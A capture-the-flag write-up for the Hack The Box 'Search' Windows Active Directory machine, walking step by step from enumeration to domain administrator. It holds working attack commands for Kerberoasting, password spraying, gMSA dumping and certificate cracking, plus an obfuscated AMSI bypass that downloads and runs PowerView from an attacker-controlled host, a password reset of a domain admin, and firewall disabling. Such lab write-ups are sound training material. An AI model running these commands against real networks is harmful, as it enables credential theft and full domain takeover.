Search

https://app.hackthebox.com/machines/Search

Nmap

sudo nmap 10.10.11.129 -p- -sS -sV

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-07-05 18:32:36Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http      Microsoft IIS httpd 10.0
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
8172/tcp  open  ssl/http      Microsoft IIS httpd 10.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
49716/tcp open  msrpc         Microsoft Windows RPC
49736/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows

Kerbrute

Starting out we hit some valid usernames whe running kerbrute against the target system. I was unable to proceed with the found usernames so we move onto enumerating the web server.

kerbrute userenum '/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt' --dc 10.10.11.129 --domain search.htb   

Basic reconnaissance against the web server shows some team members who may have valid accounts within Active Directory.

The potential users have been listed below.

Keely Lyons
Dax Santiago
Sierra Frye
Kyla Stewart
Kaiara Spencer
Dave Simpson
Ben Thompson
Chris Stewart

As we are not aware of the naming convention used for Active Directory user accounts we need to generate a list of possible combinations.

Username Generation

Username generation can be completed with usernamer. usernamer will take an input list of usernames and generate combinations based on likely naming convetions

URL: https://github.com/jseidl/usernamer

python2 usernamer.py -f usernames -l >> usernames_AD.txt

After generating the usernames we can the new list with kerbrute against. Revealing the naming convention of Firstname.Surname.

kerbrute userenum ~/Desktop/usernames_AD.txt --dc '10.10.11.129' --domain 'search.htb'

However, after multiple brute force attempts I was unable to proceed.

Information within images

After some time we head back over to the web server and after some time, we find one of the displayed images contains credential information for a internal user.

Keywords identified are "Hope Sharp" and "IsolationIsKey?". Considering we know the naming context for this Domain we try the potential credentials with crackmapexec.

crackmapexec smb '10.10.11.129' -u hope.sharp -p 'IsolationIsKey?' -d 'search.htb'

Service Prinicipal Names

With valid credentials we check for SPN's using Impacket GetUserSPNs.py and pull a krb5tgs hash for the user web_svc.

GetUserSPNs.py search.htb/hope.sharp:'IsolationIsKey?' -dc-ip '10.10.11.129' -request

Using hashcat on mode 13100 we are able to soon crack the hash with the rockyou.txt wordlist.

hashcat -a 0 -m 13100 hash.hash /usr/share/wordlists/rockyou.txt 

Credentials:web_svc:@3ONEmillionbaby

Password Spraying

I tested for some timed with the web_svc account and was unable to progress anywhere meaningful. Spraying the password against all known uses (who have been enumerated with valid credentials) we get a hit for edgar.jacobs.

crackmapexec smb '10.10.11.129' -u ~/Desktop/users -p '@3ONEmillionbaby' --continue-on-success

Credentials: edgar.jacobs:@3ONEmillionbaby

Protected Worksheets

Using these credentials against SMB with smbmap we recursively lists all available shares.

smbmap -H '10.10.11.129' -u 'edgar.jacobs' -p '@3ONEmillionbaby' -d 'search.htb' -R

Where under Edgar's Desktop redirected folders we see "Phishing_Attempt.xlsx".

Using smbmap we download the file of interest.

smbmap -H '10.10.11.129' -u 'edgar.jacobs' -p '@3ONEmillionbaby' -d 'search.htb' -R -A xlsx

Opening the Phishing_attempt.xlsx file we see under the worksheet "passwords" that column "C" is missing. As well as the worksheet being password protected.

Some research shows there is various ways of removing the worksheet protection when the password is not known:

[`https://www.ablebits.com/office-addins-blog/protect-unprotect-excel-sheet-password/#unlock-excel-spreadsheet-vba`](https://www.ablebits.com/office-addins-blog/protect-unprotect-excel-sheet-password/#unlock-excel-spreadsheet-vba)

I opted for the copy and paste method where you highlight all cells and simply paste into a net worksheet. Revealing passwords as shown below.

Password Spraying #2

Spraying the password list against the list of known users we get a hit for Sierra.Frye.

Credentials:

sierra.frye:$$49=wide=STRAIGHT=jordan=28$$18

Bloodhound

With valid credentials we can perform BloodHound enumeration externally with Bloodhound.py

GitHub: https://github.com/fox-it/BloodHound.py

python3 bloodhound.py -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -ns '10.10.11.129' -d 'search.htb'

After completing the BloodHound enumeration the results are uploaded to the console and reviewed. We see we are a member of the "Remote Management Users".

No luck, WinRM is not running externally on the target system.

GMSAPassword

Further enumeration shows effective members of the group ITSEC have the ability to read the GMSA password of BIR-ADFS-GMSA.

gMSADUmper is a python script that can be utilized to read the msDS-ManagedPassword **** attribute and decrypt with the msDS-ManagedPasswordID attribute.

gMSADumper: https://github.com/micahvandeusen/gMSADumper

python3 gMSADumper.py -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -d search.htb -l 10.10.11.129

After successfully reading and decrypting the GMSA password we are left with the following credentials: BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f

However, from here I was unable to proceed with the credentials.

Certificates

Going back to further enumeration we use smbmap to list available shares using Sierra's credentials and find some certificate files within the redirected folders share.

smbmap -H '10.10.11.129' -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -d 'search.htb' -R -A "p12"
smbmap -H '10.10.11.129' -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -d 'search.htb' -R -A "pfx" 

After downloading we are prompted for a password on the .pfx file.

pfx2john is used to convert the file to a hash usable by john.

/usr/bin/pfx2john ~/10.10.11.129-RedirectedFolders_sierra.frye_Downloads_Backups_staff.pfx >> pfxhash.hash

Cracking the hash:

sudo john --wordlist=/usr/share/wordlists/rockyou.txt pfxhash.hash 

We can now import the certificate file into Firefox. A password will be prompted to complete the action where we provide the same password shown above.

PowerShell Web Access

Moving over to the /staff web page we are given the opportunity to provide the certificate file.

We are then progressed a PowerShell web access console. Logging in with Sierra's credentials and the computer name as "research" allows logon.

User.txt

We are then able to grab the user.txt flag.

Lateral Movement with PowerShell

I was unable to find a method of privilege escalation as Sierra and BloodHound was not providing any paths for potential escalation.

I decided to proceed with gaining command execution as BIR-ADFS-GMSA$ using PowerShell remoting.

Even though we already have the credentials for BIR-ADFS-GMSA$ I used the following PowerShell snippet linked below to build a credential variable from the GMSA read ability for use with Invoke-Command.

URL: https://www.thehacker.recipes/ad/movement/dacl/readgmsapassword

$cred = new-object system.management.automation.PSCredential "search.htb\BIR-ADFS-GMSA",(ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword
Invoke-Command -ComputerName $env:computername -Credential $cred -ScriptBlock {whoami}

Invoke-ACLScanner

Whilst working as BIR-ADFS-GMSA$ I then bypassed AMSI and run Powerview's Invoke-ACL Scanner to look for ACL's of interest.

Invoke-Command -computername research -Credential $cred -ScriptBlock {S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} ); iex (iwr -usebasicparsing http://10.10.14.8:8000/powerview.ps1);Invoke-ACLScanner -ResolveGUIDs | out-file c:\redirectedfolders\Output.txt }

Looking through the results we see that BIR-ADFS-GMSA$ has GenericAll privileges over the user Tristan.Davies wo is a Domain Administrator. Weird how this attack path was not picked up by BloodHound.

As we have GenericAll over Tristan.Davies we can change the user's password.

Invoke-Command -computername research -Credential $cred -ScriptBlock {net user /domain tristan.davies Password123}

To gain full shell access I disabled the firewall with our now acquired Domain Administrator account.

crackmapexec smb '10.10.11.129' -u 'Tristan.Davies' -p 'Password123' -d 'search.htb'  -x 'netsh advfirewall set allprofiles state off'

Check the WSMAN is running with Nmap.

root.txt

Then proceeded to login with Evil-WinRM.

evil-winrm -i '10.10.11.129' -u 'Tristan.Davies' -p 'Password123'

Then grabbed the root.txt flag.